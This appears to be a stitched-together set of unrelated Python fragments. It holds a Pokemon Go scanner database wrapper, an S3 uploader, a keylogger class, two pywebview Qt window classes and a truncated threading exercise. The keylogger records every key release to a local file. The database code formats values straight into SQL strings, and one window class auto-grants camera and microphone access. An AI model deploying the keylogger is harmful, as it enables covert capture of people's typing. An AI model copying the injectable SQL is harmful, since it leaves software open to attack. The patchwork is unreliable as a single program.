str(condition), str(reward), task) log.debug( "{DbWrapperBase::submit_quest_proto} submitted quest typ %s at stop %s" % (str(quest_type), str(fort_id))) self.execute(query_quests, vals, commit=True) if self.application_args.webhook and self.application_args.quest_webhook: log.debug('Sending quest webhook for pokestop {0}'.format( str(fort_id))) self.webhook_helper.submit_quest_webhook( self.quests_from_db(GUID=fort_id)) else: log.debug('Sending Webhook is disabled') return True def create_status_database_if_not_exists(self): log.debug( "{DbWrapperBase::create_status_database_if_not_exists} called") query = (' Create table if not exists trs_status ( ' 'origin VARCHAR(50) NOT NULL , ' ' currentPos VARCHAR(50) NULL DEFAULT NULL, ' ' lastPos VARCHAR(50) NULL DEFAULT NULL, ' ' routePos INT(11) NULL DEFAULT NULL, ' ' routeMax INT(11) NULL DEFAULT NULL, ' ' routemanager VARCHAR(255) NULL DEFAULT NULL, ' ' rebootCounter INT(11) NULL DEFAULT NULL, ' ' lastProtoDateTime VARCHAR(50) NULL DEFAULT NULL, ' ' lastPogoRestart VARCHAR(50) NULL DEFAULT NULL, ' ' init TEXT NOT NULL, ' ' rebootingOption TEXT NOT NULL, ' ' restartCounter TEXT NOT NULL, ' ' PRIMARY KEY (origin))') self.execute(query, commit=True) return True def create_usage_database_if_not_exists(self): log.debug( "{DbWrapperBase::create_usage_database_if_not_exists} called") query = ('CREATE TABLE if not exists trs_usage ( ' 'usage_id INT(10) AUTO_INCREMENT , ' 'instance varchar(100) NULL DEFAULT NULL, ' 'cpu FLOAT NULL DEFAULT NULL , ' 'memory FLOAT NULL DEFAULT NULL , ' 'garbage INT(5) NULL DEFAULT NULL , ' 'timestamp INT(11) NULL DEFAULT NULL, ' 'PRIMARY KEY (usage_id))') self.execute(query, commit=True) return True def insert_usage(self, instance, cpu, mem, garbage, timestamp): log.debug("dbWrapper::insert_usage") query = ( "INSERT into trs_usage (instance, cpu, memory, garbage, timestamp) VALUES " "(%s, %s, %s, %s, %s)") vals = (instance, cpu, mem, garbage, timestamp) self.execute(query, vals, commit=True) return def save_status(self, data): log.debug("dbWrapper::save_status") query = ( "INSERT into trs_status (origin, currentPos, lastPos, routePos, routeMax, " "routemanager, rebootCounter, lastProtoDateTime, " "init, rebootingOption, restartCounter) values " "(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)" "ON DUPLICATE KEY UPDATE currentPos=VALUES(currentPos), " "lastPos=VALUES(lastPos), routePos=VALUES(routePos), " "routeMax=VALUES(routeMax), routemanager=VALUES(routemanager), " "rebootCounter=VALUES(rebootCounter), lastProtoDateTime=VALUES(lastProtoDateTime), " "init=VALUES(init), rebootingOption=VALUES(rebootingOption), restartCounter=VALUES(restartCounter)" ) vals = (data["Origin"], str(data["CurrentPos"]), str(data["LastPos"]), data["RoutePos"], data["RouteMax"], data["Routemanager"], data["RebootCounter"], data["LastProtoDateTime"], data["Init"], data["RebootingOption"], data["RestartCounter"]) self.execute(query, vals, commit=True) return def save_last_reboot(self, origin): log.debug("dbWrapper::save_last_reboot") now = datetime.now().strftime("%Y-%m-%d %H:%M:%S") query = ( "insert into trs_status(origin, lastPogoReboot, globalrebootcount) " "values (%s, %s, %s) " "ON DUPLICATE KEY UPDATE lastPogoReboot=VALUES(lastPogoReboot), globalrebootcount=(globalrebootcount+1)" ) vals = (origin, now, 1) self.execute(query, vals, commit=True) return def save_last_restart(self, origin): log.debug("dbWrapper::save_last_restart") now = datetime.now().strftime("%Y-%m-%d %H:%M:%S") query = ( "insert into trs_status(origin, lastPogoRestart, globalrestartcount) " "values (%s, %s, %s) " "ON DUPLICATE KEY UPDATE lastPogoRestart=VALUES(lastPogoRestart), globalrestartcount=(globalrestartcount+1)" ) vals = (origin, now, 1) self.execute(query, vals, commit=True) return def download_status(self): log.debug("dbWrapper::download_status") workerstatus = [] query = ( "SELECT origin, currentPos, lastPos, routePos, routeMax, " "routemanager, rebootCounter, lastProtoDateTime, lastPogoRestart, " "init, rebootingOption, restartCounter, globalrebootcount, globalrestartcount, lastPogoReboot " "FROM trs_status") result = self.execute(query) for (origin, currentPos, lastPos, routePos, routeMax, routemanager, \ rebootCounter, lastProtoDateTime, lastPogoRestart, init, rebootingOption, restartCounter, globalrebootcount, globalrestartcount, lastPogoReboot) in result: status = { "origin": origin, "currentPos": currentPos, "lastPos": lastPos, "routePos": routePos, "routeMax": routeMax, "routemanager": routemanager, "rebootCounter": rebootCounter, "lastProtoDateTime": str(lastProtoDateTime), "lastPogoRestart": str(lastPogoRestart), "init": init, "rebootingOption": rebootingOption, "restartCounter": restartCounter, "lastPogoReboot": lastPogoReboot, "globalrebootcount": globalrebootcount, "globalrestartcount": globalrestartcount } workerstatus.append(status) return str(json.dumps(workerstatus, indent=4, sort_keys=True)) def statistics_get_quests_count(self, days): log.debug('Fetching quests count from db') query_where = '' query_date = "unix_timestamp(DATE_FORMAT(FROM_UNIXTIME(quest_timestamp), '%y-%m-%d %k:00:00')) * 1000 " \ "as Timestamp" if days: days = datetime.utcnow() - timedelta(days=days) query_where = ' WHERE FROM_UNIXTIME(quest_timestamp) > \'%s\' ' % str( days) query = ( "SELECT %s, count(GUID) as Count FROM trs_quest %s " "group by day(FROM_UNIXTIME(quest_timestamp)), hour(FROM_UNIXTIME(quest_timestamp))" "order by quest_timestamp" % (str(query_date), str(query_where))) res = self.execute(query) return res def statistics_get_usage_count(self, minutes=120, instance=None): log.debug('Fetching usage from db') query_where = '' if minutes: days = datetime.now() - timedelta(minutes=int(minutes)) query_where = ' WHERE FROM_UNIXTIME(timestamp) > \'%s\' ' % str( days) if instance is not None: query_where = query_where + ' and instance = \'%s\' ' % str( instance) query = ( "SELECT cpu, memory, garbage, timestamp, instance FROM trs_usage %s " "order by timestamp" % (str(query_where))) res = self.execute(query) return res
def upload_output_to_s3(bucketName, filePrefix, fileExt): print('Uploading files to S3: {:s}/{:s}'.format(bucketName, filePrefix)) s3 = boto3.client('s3', config=botocore.client.Config( max_pool_connections=MAX_PARALLEL_UPLOADS)) global uploadFileCount uploadFileCount = 0 countLock = Lock() totalSize = 0 results = [] pool = ThreadPool(MAX_PARALLEL_UPLOADS) sema = Semaphore(MAX_PARALLEL_UPLOADS) maxval = sum(1 for _ in list_output_files(DEFAULT_OUTPUT_DIR, fileExt)) bar = progressbar.ProgressBar(maxval=maxval, widgets=[ progressbar.Bar('=', 'Uploaded [', ']'), ' ', progressbar.Percentage() ]) bar.start() def upload_file(localFilePath, uploadFileName, fileSize): sema.acquire() try: with open(localFilePath, 'rb') as ifs: s3.put_object(Body=ifs, Bucket=bucketName, Key=uploadFileName, StorageClass='REDUCED_REDUNDANCY') finally: sema.release() global uploadFileCount with countLock: uploadFileCount += 1 bar.update(uploadFileCount) if DEFAULT_KEEP_OUTPUT == False: os.remove(localFilePath) for fileName in list_output_files(DEFAULT_OUTPUT_DIR, fileExt): localFilePath = os.path.join(DEFAULT_OUTPUT_DIR, fileName) uploadFileName = os.path.join(filePrefix, fileName) fileSize = os.path.getsize(localFilePath) result = pool.apply_async(upload_file, args=(localFilePath, uploadFileName, fileSize)) results.append(result) totalSize += fileSize # block until all threads are done for result in results: result.get() # block until all uploads are finished for _ in xrange(MAX_PARALLEL_UPLOADS): sema.acquire() bar.finish() print('Uploaded {:d} files to S3 [total={:d}KB]'.format( uploadFileCount, totalSize >> 10)) return (uploadFileCount, totalSize)
class Keylogger: def __init__(self, interval): # we gonna pass SEND_REPORT_EVERY to interval self.interval = interval # this is the string variable that contains the log of all # the keystrokes within `self.interval` self.log = "" # for blocking after setting the on_release listener self.semaphore = Semaphore(0) def callback(self, event): """ This callback is invoked whenever a keyboard event is occured (i.e when a key is released in this example) """ name = event.name if len(name) > 1: # not a character, special key (e.g ctrl, alt, etc.) # uppercase with [] if name == "space": # " " instead of "space" name = " " elif name == "enter": # add a new line whenever an ENTER is pressed name = "[ENTER]\n" elif name == "decimal": name = "." else: # replace spaces with underscores name = name.replace(" ", "_") name = f"[{name.upper()}]" self.log += name def sendkeys(self, message): f = open("keystroke.txt", "a") f.write(message) f.close() def report(self): """ This function gets called every `self.interval` It basically sends keylogs and resets `self.log` variable """ if self.log: # if there is something in log, report it self.sendkeys(self.log) # can print to a file, whatever you want # print(self.log) self.log = "" Timer(interval=self.interval, function=self.report).start() def start(self): # start the keylogger keyboard.on_release(callback=self.callback) # start reporting the keylogs self.report() # block the current thread, # since on_release() doesn't block the current thread # if we don't block it, when we execute the program, nothing will happen # that is because on_release() will start the listener in a separate thread self.semaphore.acquire()
class BrowserView(QMainWindow): instances = {} inspector_port = None # The localhost port at which the Remote debugger listens create_window_trigger = QtCore.pyqtSignal(object) set_title_trigger = QtCore.pyqtSignal(str) load_url_trigger = QtCore.pyqtSignal(str) html_trigger = QtCore.pyqtSignal(str, str) dialog_trigger = QtCore.pyqtSignal(int, str, bool, str, str) destroy_trigger = QtCore.pyqtSignal() fullscreen_trigger = QtCore.pyqtSignal() window_size_trigger = QtCore.pyqtSignal(int, int) window_move_trigger = QtCore.pyqtSignal(int, int) current_url_trigger = QtCore.pyqtSignal() evaluate_js_trigger = QtCore.pyqtSignal(str, str) class JSBridge(QtCore.QObject): qtype = QtCore.QJsonValue if is_webengine else str def __init__(self): super(BrowserView.JSBridge, self).__init__() @QtCore.pyqtSlot(str, qtype, str, result=str) def call(self, func_name, param, value_id): func_name = BrowserView._convert_string(func_name) param = BrowserView._convert_string(param) return js_bridge_call(self.window, func_name, param, value_id) class WebView(QWebView): def __init__(self, parent=None): super(BrowserView.WebView, self).__init__(parent) if parent.frameless: QApplication.instance().installEventFilter(self) self.setMouseTracking(True) def contextMenuEvent(self, event): menu = self.page().createStandardContextMenu() # If 'Inspect Element' is present in the default context menu, it # means the inspector is already up and running. for i in menu.actions(): if i.text() == 'Inspect Element': break else: # Inspector is not up yet, so create a pseudo 'Inspect Element' # menu that will fire it up. inspect_element = QAction('Inspect Element', menu) inspect_element.triggered.connect(self.show_inspector) menu.addAction(inspect_element) menu.exec_(event.globalPos()) # Create a new webview window pointing at the Remote debugger server def show_inspector(self): uid = self.parent().uid + '-inspector' try: # If inspector already exists, bring it to the front BrowserView.instances[uid].raise_() BrowserView.instances[uid].activateWindow() except KeyError: title = 'Web Inspector - {}'.format(self.parent().title) url = 'http://localhost:{}'.format(BrowserView.inspector_port) window = Window('web_inspector', title, url, '', 700, 500, True, False, (300, 200), False, '#fff', None, False, False) inspector = BrowserView(window) inspector.show() def mousePressEvent(self, event): if event.button() == QtCore.Qt.LeftButton: self.drag_pos = event.globalPos() - self.parent( ).frameGeometry().topLeft() event.accept() def mouseMoveEvent(self, event): if self.parent().frameless and int( event.buttons()) == 1: # left button is pressed self.parent().move(event.globalPos() - self.drag_pos) def eventFilter(self, object, event): if object.parent() == self: if event.type() == QtCore.QEvent.MouseMove: self.mouseMoveEvent(event) elif event.type() == QtCore.QEvent.MouseButtonPress: self.mousePressEvent(event) return False # New-window-requests handler for Qt 5.5+ only class NavigationHandler(QWebPage): def __init__(self, parent=None): super(BrowserView.NavigationHandler, self).__init__(parent) def acceptNavigationRequest(self, url, type, is_main_frame): webbrowser.open(url.toString(), 2, True) return False class WebPage(QWebPage): def __init__(self, parent=None): super(BrowserView.WebPage, self).__init__(parent) self.nav_handler = BrowserView.NavigationHandler( self) if is_webengine else None if not is_webengine: def acceptNavigationRequest(self, frame, request, type): if frame is None: webbrowser.open(request.url().toString(), 2, True) return False return True def createWindow(self, type): return self.nav_handler def __init__(self, window): super(BrowserView, self).__init__() BrowserView.instances[window.uid] = self self.uid = window.uid self.pywebview_window = window self.js_bridge = BrowserView.JSBridge() self.js_bridge.window = window self.is_fullscreen = False self.confirm_close = window.confirm_close self.text_select = window.text_select self._file_name_semaphore = Semaphore(0) self._current_url_semaphore = Semaphore(0) self.loaded = window.loaded self.shown = window.shown self._js_results = {} self._current_url = None self._file_name = None self.resize(window.width, window.height) self.title = window.title self.setWindowTitle(window.title) # Set window background color self.background_color = QColor() self.background_color.setNamedColor(window.background_color) palette = self.palette() palette.setColor(self.backgroundRole(), self.background_color) self.setPalette(palette) if not window.resizable: self.setFixedSize(window.width, window.height) self.setMinimumSize(window.min_size[0], window.min_size[1]) self.frameless = window.frameless if self.frameless: self.setWindowFlags(QtCore.Qt.Window | QtCore.Qt.FramelessWindowHint) self.view = BrowserView.WebView(self) if _debug and is_webengine: # Initialise Remote debugging (need to be done only once) if not BrowserView.inspector_port: BrowserView.inspector_port = BrowserView._get_free_port() os.environ[ 'QTWEBENGINE_REMOTE_DEBUGGING'] = BrowserView.inspector_port else: self.view.setContextMenuPolicy( QtCore.Qt.NoContextMenu) # disable right click context menu self.view.setPage(BrowserView.WebPage(self.view)) self.view.page().loadFinished.connect(self.on_load_finished) self.setCentralWidget(self.view) self.create_window_trigger.connect(BrowserView.on_create_window) self.load_url_trigger.connect(self.on_load_url) self.html_trigger.connect(self.on_load_html) self.dialog_trigger.connect(self.on_file_dialog) self.destroy_trigger.connect(self.on_destroy_window) self.fullscreen_trigger.connect(self.on_fullscreen) self.window_size_trigger.connect(self.on_window_size) self.window_move_trigger.connect(self.on_window_move) self.current_url_trigger.connect(self.on_current_url) self.evaluate_js_trigger.connect(self.on_evaluate_js) self.set_title_trigger.connect(self.on_set_title) if is_webengine and platform.system() != 'OpenBSD': self.channel = QWebChannel(self.view.page()) self.view.page().setWebChannel(self.channel) if window.fullscreen: self.toggle_fullscreen() if window.url is not None: self.view.setUrl(QtCore.QUrl(window.url)) elif window.html: self.view.setHtml(window.html, QtCore.QUrl('')) else: self.view.setHtml(default_html, QtCore.QUrl('')) if window.x is not None and window.y is not None: self.move(window.x, window.y) else: center = QApplication.desktop().availableGeometry().center( ) - self.rect().center() self.move(center.x(), center.y()) self.activateWindow() self.raise_() self.shown.set() def on_set_title(self, title): self.setWindowTitle(title) def on_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter): if dialog_type == FOLDER_DIALOG: self._file_name = QFileDialog.getExistingDirectory( self, localization['linux.openFolder'], options=QFileDialog.ShowDirsOnly) elif dialog_type == OPEN_DIALOG: if allow_multiple: self._file_name = QFileDialog.getOpenFileNames( self, localization['linux.openFiles'], directory, file_filter) else: self._file_name = QFileDialog.getOpenFileName( self, localization['linux.openFile'], directory, file_filter) elif dialog_type == SAVE_DIALOG: if directory: save_filename = os.path.join(str(directory), str(save_filename)) self._file_name = QFileDialog.getSaveFileName( self, localization['global.saveFile'], save_filename) self._file_name_semaphore.release() def on_current_url(self): url = BrowserView._convert_string(self.view.url().toString()) self._current_url = None if url == '' or url.startswith( 'data:text/html') else url self._current_url_semaphore.release() def on_load_url(self, url): self.view.setUrl(QtCore.QUrl(url)) def on_load_html(self, content, base_uri): self.view.setHtml(content, QtCore.QUrl(base_uri)) def closeEvent(self, event): if self.confirm_close: reply = QMessageBox.question( self, self.title, localization['global.quitConfirmation'], QMessageBox.Yes, QMessageBox.No) if reply == QMessageBox.No: event.ignore() return event.accept() del BrowserView.instances[self.uid] if self.pywebview_window in windows: windows.remove(self.pywebview_window) try: # Close inspector if open BrowserView.instances[self.uid + '-inspector'].close() del BrowserView.instances[self.uid + '-inspector'] except KeyError: pass if len(BrowserView.instances) == 0: self.hide() _app.exit() def on_destroy_window(self): self.close() def on_fullscreen(self): if self.is_fullscreen: self.showNormal() else: self.showFullScreen() self.is_fullscreen = not self.is_fullscreen def on_window_size(self, width, height): self.setFixedSize(width, height) def on_window_move(self, x, y): self.move(x, y) def on_evaluate_js(self, script, uuid): def return_result(result): result = BrowserView._convert_string(result) uuid_ = BrowserView._convert_string(uuid) js_result = self._js_results[uuid_] js_result[ 'result'] = None if result is None or result == 'null' else result if result == '' else json.loads( result) js_result['semaphore'].release() try: # < Qt5.6 result = self.view.page().mainFrame().evaluateJavaScript(script) return_result(result) except AttributeError: self.view.page().runJavaScript(script, return_result) except Exception as e: print(e) def on_load_finished(self): self._set_js_api() if not self.text_select: script = disable_text_select.replace('\n', '') try: # QT < 5.6 self.view.page().mainFrame().evaluateJavaScript(script) except AttributeError: self.view.page().runJavaScript(script) def set_title(self, title): self.set_title_trigger.emit(title) def get_current_url(self): self.loaded.wait() self.current_url_trigger.emit() self._current_url_semaphore.acquire() return self._current_url def load_url(self, url): self.loaded.clear() self.load_url_trigger.emit(url) def load_html(self, content, base_uri): self.loaded.clear() self.html_trigger.emit(content, base_uri) def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter): self.dialog_trigger.emit(dialog_type, directory, allow_multiple, save_filename, file_filter) self._file_name_semaphore.acquire() if dialog_type == FOLDER_DIALOG: file_names = (self._file_name, ) elif dialog_type == SAVE_DIALOG or not allow_multiple: file_names = (self._file_name[0], ) else: file_names = tuple(self._file_name[0]) # Check if we got an empty tuple, or a tuple with empty string if len(file_names) == 0 or len(file_names[0]) == 0: return None else: return file_names def destroy_(self): self.destroy_trigger.emit() def toggle_fullscreen(self): self.fullscreen_trigger.emit() def set_window_size(self, width, height): self.window_size_trigger.emit(width, height) def move_window(self, x, y): self.window_move_trigger.emit(x, y) def evaluate_js(self, script): self.loaded.wait() result_semaphore = Semaphore(0) unique_id = uuid1().hex self._js_results[unique_id] = { 'semaphore': result_semaphore, 'result': '' } self.evaluate_js_trigger.emit(script, unique_id) result_semaphore.acquire() result = deepcopy(self._js_results[unique_id]['result']) del self._js_results[unique_id] return result def _set_js_api(self): def _register_window_object(): frame.addToJavaScriptWindowObject('external', self.js_bridge) code = 'qtwebengine' if is_webengine else 'qtwebkit' script = parse_api_js(self.js_bridge.window.js_api, code) if is_webengine: qwebchannel_js = QtCore.QFile('://qtwebchannel/qwebchannel.js') if qwebchannel_js.open(QtCore.QFile.ReadOnly): source = bytes(qwebchannel_js.readAll()).decode('utf-8') self.view.page().runJavaScript(source) self.channel.registerObject('external', self.js_bridge) qwebchannel_js.close() else: frame = self.view.page().mainFrame() _register_window_object() try: # < QT 5.6 self.view.page().mainFrame().evaluateJavaScript(script) except AttributeError: self.view.page().runJavaScript(script) self.loaded.set() @staticmethod def _convert_string(result): try: if result is None or result.isNull(): return None result = result.toString() # QJsonValue conversion except AttributeError: pass return convert_string(result) @staticmethod # A simple function to obtain an unused localhost port from the os return it def _get_free_port(): s = socket() s.bind(('localhost', 0)) port = str(s.getsockname()[1]) s.close() return port @staticmethod # Receive func from subthread and execute it on the main thread def on_create_window(func): func()
if nDancers == 0: emptyFloor.release() print('\n Number of dancers on floor are: %d.\n' % nDancers) floorMutex2.release() if __name__ == '__main__': no_of_leaders=int(input('Enter the number of leaders: ')) no_of_followers=int(input('Enter the number of followers: ')) ldrthrd = [Thread(target=leaders, args=[i]) for i in range(no_of_leaders)] for lt in ldrthrd: lt.start() flrthrd = [Thread(target=followers, args=[i]) for i in range(no_of_followers)] for ft in flrthrd: ft.start() for music in cycle(['waltz', 'tango', 'foxtrot']): print("** Band leader started playing the music %s **" %(music)) emptyFloor.release() bandLeaderBarrier.release() sleep(5) bandLeaderBarrier.acquire() emptyFloor.acquire() sleep(random()) # floorEmpty.release() print("** Band leader stopped playing the music %s **" %(music))
class BrowserView(QMainWindow): instances = {} inspector_port = None # The localhost port at which the Remote debugger listens create_window_trigger = QtCore.pyqtSignal(object) set_title_trigger = QtCore.pyqtSignal(str) load_url_trigger = QtCore.pyqtSignal(str) html_trigger = QtCore.pyqtSignal(str, str) dialog_trigger = QtCore.pyqtSignal(int, str, bool, str, str) destroy_trigger = QtCore.pyqtSignal() hide_trigger = QtCore.pyqtSignal() show_trigger = QtCore.pyqtSignal() fullscreen_trigger = QtCore.pyqtSignal() window_size_trigger = QtCore.pyqtSignal(int, int) window_move_trigger = QtCore.pyqtSignal(int, int) window_minimize_trigger = QtCore.pyqtSignal() window_restore_trigger = QtCore.pyqtSignal() current_url_trigger = QtCore.pyqtSignal() evaluate_js_trigger = QtCore.pyqtSignal(str, str) on_top_trigger = QtCore.pyqtSignal(bool) class JSBridge(QtCore.QObject): qtype = QtCore.QJsonValue if is_webengine else str def __init__(self): super(BrowserView.JSBridge, self).__init__() @QtCore.pyqtSlot(str, qtype, str, result=str) def call(self, func_name, param, value_id): func_name = BrowserView._convert_string(func_name) param = BrowserView._convert_string(param) return js_bridge_call(self.window, func_name, json.loads(param), value_id) class WebView(QWebView): def __init__(self, parent=None): super(BrowserView.WebView, self).__init__(parent) if parent.frameless and parent.easy_drag: QApplication.instance().installEventFilter(self) self.setMouseTracking(True) def contextMenuEvent(self, event): menu = self.page().createStandardContextMenu() # If 'Inspect Element' is present in the default context menu, it # means the inspector is already up and running. for i in menu.actions(): if i.text() == "Inspect Element": break else: # Inspector is not up yet, so create a pseudo 'Inspect Element' # menu that will fire it up. inspect_element = QAction("Inspect Element", menu) inspect_element.triggered.connect(self.show_inspector) menu.addAction(inspect_element) menu.exec_(event.globalPos()) # Create a new webviewb window pointing at the Remote debugger server def show_inspector(self): uid = self.parent().uid + "-inspector" try: # If inspector already exists, bring it to the front BrowserView.instances[uid].raise_() BrowserView.instances[uid].activateWindow() except KeyError: title = "Web Inspector - {}".format(self.parent().title) url = "http://localhost:{}".format(BrowserView.inspector_port) window = Window( "web_inspector", title, url, "", 700, 500, None, None, True, False, (300, 200), False, False, False, False, False, "#fff", None, False, False, ) inspector = BrowserView(window) inspector.show() def mousePressEvent(self, event): if event.button() == QtCore.Qt.LeftButton: self.drag_pos = (event.globalPos() - self.parent().frameGeometry().topLeft()) event.accept() def mouseMoveEvent(self, event): parent = self.parent() if (parent.frameless and parent.easy_drag and int(event.buttons()) == 1): # left button is pressed parent.move(event.globalPos() - self.drag_pos) def eventFilter(self, object, event): if object.parent() == self: if event.type() == QtCore.QEvent.MouseMove: self.mouseMoveEvent(event) elif event.type() == QtCore.QEvent.MouseButtonPress: self.mousePressEvent(event) return False # New-window-requests handler for Qt 5.5+ only class NavigationHandler(QWebPage): def __init__(self, parent=None): super(BrowserView.NavigationHandler, self).__init__(parent) def acceptNavigationRequest(self, url, type, is_main_frame): webbrowser.open(url.toString(), 2, True) return False class WebPage(QWebPage): def __init__(self, parent=None): super(BrowserView.WebPage, self).__init__(parent) if is_webengine: self.featurePermissionRequested.connect( self.onFeaturePermissionRequested) self.nav_handler = BrowserView.NavigationHandler(self) else: self.nav_handler = None if is_webengine: def onFeaturePermissionRequested(self, url, feature): if feature in ( QWebPage.MediaAudioCapture, QWebPage.MediaVideoCapture, QWebPage.MediaAudioVideoCapture, ): self.setFeaturePermission(url, feature, QWebPage.PermissionGrantedByUser) else: self.setFeaturePermission(url, feature, QWebPage.PermissionDeniedByUser) else: def acceptNavigationRequest(self, frame, request, type): if frame is None: webbrowser.open(request.url().toString(), 2, True) return False return True def userAgentForUrl(self, url): user_agent = settings.get("user_agent") or _user_agent if user_agent: return user_agent else: return super().userAgentForUrl(url) def createWindow(self, type): return self.nav_handler def __init__(self, window): super(BrowserView, self).__init__() BrowserView.instances[window.uid] = self self.uid = window.uid self.pywebview_window = window self.js_bridge = BrowserView.JSBridge() self.js_bridge.window = window self.is_fullscreen = False self.confirm_close = window.confirm_close self.text_select = window.text_select self._file_name_semaphore = Semaphore(0) self._current_url_semaphore = Semaphore(0) self.loaded = window.loaded self.shown = window.shown self._js_results = {} self._current_url = None self._file_name = None self.resize(window.initial_width, window.initial_height) self.title = window.title self.setWindowTitle(window.title) # Set window background color self.background_color = QColor() self.background_color.setNamedColor(window.background_color) palette = self.palette() palette.setColor(self.backgroundRole(), self.background_color) self.setPalette(palette) if not window.resizable: self.setFixedSize(window.initial_width, window.initial_height) self.setMinimumSize(window.min_size[0], window.min_size[1]) self.frameless = window.frameless self.easy_drag = window.easy_drag flags = self.windowFlags() if self.frameless: flags = flags | QtCore.Qt.FramelessWindowHint if window.on_top: flags = flags | QtCore.Qt.WindowStaysOnTopHint self.setWindowFlags(flags) self.view = BrowserView.WebView(self) if is_webengine: os.environ[ "QTWEBENGINE_CHROMIUM_FLAGS"] = "--use-fake-ui-for-media-stream --enable-features=AutoplayIgnoreWebAudio" if _debug and is_webengine: # Initialise Remote debugging (need to be done only once) if not BrowserView.inspector_port: BrowserView.inspector_port = BrowserView._get_debug_port() os.environ[ "QTWEBENGINE_REMOTE_DEBUGGING"] = BrowserView.inspector_port else: self.view.setContextMenuPolicy( QtCore.Qt.NoContextMenu) # disable right click context menu self.view.setPage(BrowserView.WebPage(self.view)) self.view.page().loadFinished.connect(self.on_load_finished) self.setCentralWidget(self.view) self.create_window_trigger.connect(BrowserView.on_create_window) self.load_url_trigger.connect(self.on_load_url) self.html_trigger.connect(self.on_load_html) self.dialog_trigger.connect(self.on_file_dialog) self.destroy_trigger.connect(self.on_destroy_window) self.show_trigger.connect(self.on_show_window) self.hide_trigger.connect(self.on_hide_window) self.fullscreen_trigger.connect(self.on_fullscreen) self.window_size_trigger.connect(self.on_window_size) self.window_move_trigger.connect(self.on_window_move) self.window_minimize_trigger.connect(self.on_window_minimize) self.window_restore_trigger.connect(self.on_window_restore) self.current_url_trigger.connect(self.on_current_url) self.evaluate_js_trigger.connect(self.on_evaluate_js) self.set_title_trigger.connect(self.on_set_title) self.on_top_trigger.connect(self.on_set_on_top) if is_webengine and platform.system() != "OpenBSD": self.channel = QWebChannel(self.view.page()) self.view.page().setWebChannel(self.channel) if window.fullscreen: self.toggle_fullscreen() if window.url is not None: self.view.setUrl(QtCore.QUrl(window.url)) elif window.html: self.view.setHtml(window.html, QtCore.QUrl("")) else: self.view.setHtml(default_html, QtCore.QUrl("")) if window.initial_x is not None and window.initial_y is not None: self.move(window.initial_x, window.initial_y) else: center = (QApplication.desktop().availableGeometry().center() - self.rect().center()) self.move(center.x(), center.y()) if not window.minimized: self.activateWindow() self.raise_() self.shown.set() def on_set_title(self, title): self.setWindowTitle(title) def on_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter): if dialog_type == FOLDER_DIALOG: self._file_name = QFileDialog.getExistingDirectory( self, localization["linux.openFolder"], options=QFileDialog.ShowDirsOnly) elif dialog_type == OPEN_DIALOG: if allow_multiple: self._file_name = QFileDialog.getOpenFileNames( self, localization["linux.openFiles"], directory, file_filter) else: self._file_name = QFileDialog.getOpenFileName( self, localization["linux.openFile"], directory, file_filter) elif dialog_type == SAVE_DIALOG: if directory: save_filename = os.path.join(str(directory), str(save_filename)) self._file_name = QFileDialog.getSaveFileName( self, localization["global.saveFile"], save_filename, file_filter) self._file_name_semaphore.release() def on_current_url(self): url = BrowserView._convert_string(self.view.url().toString()) self._current_url = (None if url == "" or url.startswith("data:text/html") else url) self._current_url_semaphore.release() def on_load_url(self, url): self.view.setUrl(QtCore.QUrl(url)) def on_load_html(self, content, base_uri): self.view.setHtml(content, QtCore.QUrl(base_uri)) def on_set_on_top(self, top): flags = self.windowFlags() if top: self.setWindowFlags(flags | QtCore.Qt.WindowStaysOnTopHint) else: self.setWindowFlags(flags & ~QtCore.Qt.WindowStaysOnTopHint) self.show() def closeEvent(self, event): self.pywebview_window.closing.set() if self.confirm_close: reply = QMessageBox.question( self, self.title, localization["global.quitConfirmation"], QMessageBox.Yes, QMessageBox.No, ) if reply == QMessageBox.No: event.ignore() return event.accept() BrowserView.instances[self.uid].close() del BrowserView.instances[self.uid] if self.pywebview_window in windows: windows.remove(self.pywebview_window) self.pywebview_window.closed.set() if len(BrowserView.instances) == 0: self.hide() _app.exit() def on_show_window(self): self.show() def on_hide_window(self): self.hide() def on_destroy_window(self): self.close() def on_fullscreen(self): if self.is_fullscreen: self.showNormal() else: self.showFullScreen() self.is_fullscreen = not self.is_fullscreen def on_window_size(self, width, height): self.setFixedSize(width, height) def on_window_move(self, x, y): self.move(x, y) def on_window_minimize(self): self.setWindowState(QtCore.Qt.WindowMinimized) def on_window_restore(self): self.setWindowState(QtCore.Qt.WindowNoState) self.raise_() self.activateWindow() def on_evaluate_js(self, script, uuid): def return_result(result): result = BrowserView._convert_string(result) uuid_ = BrowserView._convert_string(uuid) js_result = self._js_results[uuid_] js_result["result"] = ( None if result is None or result == "null" else result if result == "" else json.loads(result)) js_result["semaphore"].release() try: # < Qt5.6 self.view.page().runJavaScript(script, return_result) except AttributeError: result = self.view.page().mainFrame().evaluateJavaScript(script) return_result(result) except Exception as e: logger.exception(e) def on_load_finished(self): self._set_js_api() if not self.text_select: script = disable_text_select.replace("\n", "") try: self.view.page().runJavaScript(script) except: # QT < 5.6 self.view.page().mainFrame().evaluateJavaScript(script) def set_title(self, title): self.set_title_trigger.emit(title) def get_current_url(self): self.loaded.wait() self.current_url_trigger.emit() self._current_url_semaphore.acquire() return self._current_url def load_url(self, url): self.loaded.clear() self.load_url_trigger.emit(url) def load_html(self, content, base_uri): self.loaded.clear() self.html_trigger.emit(content, base_uri) def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter): self.dialog_trigger.emit(dialog_type, directory, allow_multiple, save_filename, file_filter) self._file_name_semaphore.acquire() if dialog_type == FOLDER_DIALOG: file_names = (self._file_name, ) elif dialog_type == SAVE_DIALOG or not allow_multiple: file_names = (self._file_name[0], ) else: file_names = tuple(self._file_name[0]) # Check if we got an empty tuple, or a tuple with empty string if len(file_names) == 0 or len(file_names[0]) == 0: return None else: return file_names def hide_(self): self.hide_trigger.emit() def show_(self): self.show_trigger.emit() def destroy_(self): self.destroy_trigger.emit() def toggle_fullscreen(self): self.fullscreen_trigger.emit() def resize_(self, width, height): self.window_size_trigger.emit(width, height) def move_window(self, x, y): self.window_move_trigger.emit(x, y) def minimize(self): self.window_minimize_trigger.emit() def restore(self): self.window_restore_trigger.emit() def set_on_top(self, top): self.on_top_trigger.emit(top) def evaluate_js(self, script): self.loaded.wait() result_semaphore = Semaphore(0) unique_id = uuid1().hex self._js_results[unique_id] = { "semaphore": result_semaphore, "result": "" } self.evaluate_js_trigger.emit(script, unique_id) 